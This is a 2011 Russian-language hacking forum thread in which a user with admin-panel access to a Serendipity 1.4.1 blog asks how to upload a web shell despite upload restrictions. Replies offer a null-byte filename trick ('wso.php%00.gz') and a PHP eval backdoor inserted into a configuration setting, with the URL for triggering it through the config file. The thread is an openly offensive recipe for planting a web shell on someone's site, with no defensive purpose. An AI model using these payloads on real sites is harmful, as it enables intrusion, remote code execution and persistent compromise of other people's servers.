Заливка веб-шелла через админку

Discussion in 'Песочница' started by Pirotexnik, 28 Nov 2011.

  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    375
    Likes Received:
    73
    Reputations:
    38
    Доброго времени суток.
    Есть доступ в админку Serendipity 1.4.1.
    Нету возможгости заливать "активные файлы".
    Перепробовал кучу вариантов с нуль-байтом, кавычками и тп.
    Не вышло.

    Смог залить запакованую версию wso.php.gz

    Есть какой нить вариант залить рабочий шелл?
     
  2. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Пробуй через конфиг:
    eval(stripslashes($_POST[cmd']));
     
    1 person likes this.
  3. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    939
    Likes Received:
    524
    Reputations:
    173
    wso.php%00.gz --> wso.php

    сорь не уследил за твойм текстом, про нул байт.
     
    #3 OxoTnik, 29 Nov 2011
    Last edited: 29 Nov 2011
    2 people like this.
  4. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    375
    Likes Received:
    73
    Reputations:
    38
    Нету доступа к консоле. Есть только доступ в админку блога на сайте.
     
  5. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Через админку:
    Adminstration => Configuration
    Там много параметров, в одну "маловажную" ставишь свой шелл-код, в нашем случае:
    eval(stripslashes($_GET[cmd']));
    Потом, по идее, шелл должен быть по адресу:
    http://site.ru/serendipity_config_local.inc.php?cmd=phpinfo();

    P.S. Не тестил =)
     
  6. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    375
    Likes Received:
    73
    Reputations:
    38
    Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
     
    1 person likes this.